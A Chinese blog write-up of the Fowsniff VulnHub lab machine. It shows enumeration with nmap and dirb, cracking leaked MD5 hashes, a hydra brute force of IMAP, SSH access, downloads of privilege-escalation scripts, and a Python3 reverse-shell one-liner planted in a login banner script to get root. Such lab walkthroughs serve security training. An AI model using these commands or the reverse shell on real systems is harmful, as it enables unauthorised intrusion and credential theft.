渗透测试实战-Fowsniff靶机入侵

最新推荐文章于 2024-05-06 20:25:44 发布
最新推荐文章于 2024-05-06 20:25:44 发布
阅读量3.9k 收藏 9
点赞数 2
分类专栏: VULNHUB靶场题解集合
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/84572255
版权

机安装/下载

Fowsniff靶机下载:https://pan.baidu.com/s/1dvCJijStPYkeGtoSaLyg7A

 

Kali的IP地址:192.168.100.8

WIN7的IP地址:192.168.100.9

 

 

先用nmap 进行探测

发现目标的IP地址为192.168.100.12

然后在进行靶机端口的探测

先从80端口下手看看

对这个网站进行目录扫描,也就发现目录遍历其他没什么发现

dirb http://192.168.100.12 /usr/share/dirb/wordlists/big.txt 

 

那么根据这些靶机的尿性,突破口肯定是在首页或者其他页面,我们把目光放在首页上

通过首页上的接受,说明网站被人搞了,@fowsniffcorp的信息肯定被攻击者泄漏放在互联网上了,这时候不用怀疑是时候表演表演真正的谷歌技术了,

1.打开谷歌

2.输入 @fowsniffcorp 回车

就出现了这个网站:https://pastebin.com/NrAqVeeX

在这个泄漏的信息里我们拿到一些账户和加密的密码

下一步我们需要把这些md5的密文解密并跟账户分开保存,方便后面的破解工作,批量md5密文解密小弟用了somd5的平台,地址:

https://www.somd5.com/batch.html

 

可以看到只有一个密文无法解密,但是不影响我们继续下一步工作,这个时候我们把目标放在imap服务上,我们先探测一下看看这个服务,小弟这里使用msf来,您也可以在前面探测的时候直接加上nmap的 script模块

可以看到这个服务是正常使用的,下一步我们就是使用刚刚获取到的账户密码破解试试,这里小弟还是继续使用hydra来完成,您也可以使用其他工具,命令如下:

 hydra -L /root/username.txt -P /root/password.txt imap://192.168.100.12
 

成功破解出密码:seina :scoobydoo2,

下一步我们试着登陆看看,到了这里有小伙伴就要问了,这个服务这么登陆呢?这里你可以使用命令行来登陆,也可以使用foxmail来登陆,小弟这里使用foxmail来登陆,配置如下:

 

配置好以后,收到了2个邮件,其中在一个邮件里收到了一个密码,如图:

密码为:S1ck3nBluff+secureshell

 

下面我们使用这个密码去登陆 “baksteen”账户,为什么是他呢?因为第二封邮件他回复了。。。。

成功登陆了,下一步就是提权了,老规矩我们在/tmp目录下下载2个提权脚本,如图:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

下载完后 给这2个文件执行权限

chmod +x LinEnum.sh

chomod +x linuxprivchecker.py

 

 

 

在运行“linuxprivchecker.py”的时候可以看到靶机只安装了python3,

通过另外一个脚本,没发现什么突破口

 

到了这里小弟被卡了一段时间,最后小弟因为下班回家,又重新登陆了一下这个ssh,看到登陆的banner引起了我的警觉… 这尼玛肯定又问题,使用我在用户目录下面查看,如图:

分别cat 那几个带头为点的隐藏文件

 

在vim中操作的行为,vim会自动记录下来保存到.viminfo中

 

cat .viminfo的时候出现了几个可以的sh文件

经过查找测试发现只有/opt/cube能用,我们cd过去

然后发现了一个有价值的东西

vim下

这个就是shell的banner页面

那我们写上python3d的反弹shell代码,连上shell除了执行banner页面还会反弹一个shell

因为这个靶机只有python3 所以要用注意用python3

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.100.8',4545));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

然后我们用kali来监听4545端口

因为这个是显示banner的就是刚登陆ssh的图像,所以这里需要另外开一个命令行,

重新去登陆刚刚“baksteen”ssh账户,如图:

最后拿flag

大方子
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【100分】 【数据最节约的备份方法】
weixin_54707168的博客
02-22 1889
这道题目要求使用刻录光盘的方式对若干个文件进行备份,每张光盘的容量为500MB。需要计算使用光盘最少的文件分布方式,保证所有文件的大小都是整数的MB,且不超过500MB,文件不能分割、分卷打包。有若干个文件,使用刻录光盘的方式进行备份,假设每张光盘的容量是500MB,求使用光盘最少的文件分布方式。以上就是解决这个问题的主要思路和算法步骤。在代码中,我保留了原有的中文注释,使得代码更易于理解。所有文件的大小都是整数的MB,且不超过500MB;文件不能分割、分卷打包。为了解决这个问题,我们可以使用回溯算法。
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
2024年网络安全最全CTF比赛之BurpSuite教程,2024年最新快来收藏
最新发布
2401_84281629的博客
05-06 667
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
pikachu靶场分析笔记
RestoreJustice的博客
03-16 959
敏感信息泄露虽然一直被评为危害比较低的漏洞,但这些敏感信息往往给攻击着实施进一步的攻击提供很大的帮助,甚至“离谱”的敏感信息泄露也会直接造成严重的损失。测试发现,这里输入kobe可以显示,输入kobe’ and 1=1#时也显示,但输入kobe’ and 1=2#时显示不存在,说明,kobe肯定为真的,只要and后面也为真,则返回kobe结果。这样就不会刷新验证码。只要我们爆破时,把上一次的请求响应包中的token值当作这一次的token一起提交到服务端即可完成token验证,也就达到了爆破的目的。
Java-Sec-Code靶场
Aiwin的博客
08-15 1284
Java-Sec-Code靶场
Pikachu靶机通关和源码分析
Aiwin的博客
07-25 3234
Pikachu靶机通关和源码分析
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
pikachu 靶场通关(全)
Innocence_0的博客
04-12 3037
1.1.1 漏洞利用burp抓包,ctrl+i 添加爆破根据返回长度得到两个用户。
DVWA渗透测试环境搭建
07-05
渗透测试环境搭建DVWA渗透测试环境搭建DVWA渗透测试环境搭建DVWA
linux提权辅助脚本整合
干铮的博客
02-20 2037
1. LinEnum的使用 这个脚本是用来收集系统的信息,如:特殊文件的权限、suid文件信息、网络端口信息。 sudo python -m SimpleHTTPServer 80 下载文件执行 wget http://192.168.0.109/LinEnum.sh 历史记录找到 root 密码yanisy123 2. linux-exploit-suggester的使用 这个用来检测是否存在提权cve漏洞 下载文件执行 wget https://raw.githubuserco.
pikachu靶场搭建教程(以物理主机访问虚拟机为例)
Victor1889的博客
12-20 3488
pikachu靶场搭建教程(以物理主机访问虚拟机为例)
Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 1854
Metasploitable2靶机漏洞发现与渗透测试
【HACKER KID: 1.0.1靶机
qq_40646572的博客
05-23 1609
信息搜集 开启靶机。 使用nmap扫描,发现存活靶机,192.168.85.145,靶机开放端口为53,80,9999。 进一步搜集下对应段开启的服务。 发现,9999端口开启的是tornado服务。 先打开web网站,看下。 好像再提示挖掘?还是使用dig工具?先放下,继续搜集信息。 #app.html页面源码,发现存在提示,给了一个参数。这个参数应该是页面数,先尝试下。 发现page_no=21时,返回数据不同。 提示我们这个网站还绑定了一个域名,先添加到/etc/hosts文本中。
权限提升_初探
qq_53377571的博客
02-14 506
windows和linux的系统提权,数据库mysql的udf提权,从web端渗透事例(小迪学习)
java部署ngks_16 部署靶机环境上
weixin_39771301的博客
02-27 672
1. asp环境搭建提取码:b0ii1.1 新建网站1.2 配置网站属性选中网站 --> 右键 --> 属性选中网站 --> 右键 --> 权限然后确定,设置数据库写入权限 路径:C:\wwwtest\1acc_free1.3 登录网站地址 : http://10.0.0.200:81/index2.asp账号 : admin 密码 : admin1.4 ...
OWASP靶机下载安装详细过程
热门推荐
xxx_Python的博客
05-22 2万+
OWASP靶机下载安装详细过程一、 OWASP靶机下载二、 VM虚拟机三、 OWASP安装四、 OWASP启动运行 一、 OWASP靶机下载 下载地址:https://sourceforge.net/projects/owaspbwa/files/. 一般可直接点击“Download Latest Version”下载最新版本的OWASP靶机 二、 VM虚拟机 安装可自行上网查看安装教程,本次使用VM15pro 三、 OWASP安装 保证磁盘容量有10G左右或以上,解压下载的OWASP压缩包 打开VM虚
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值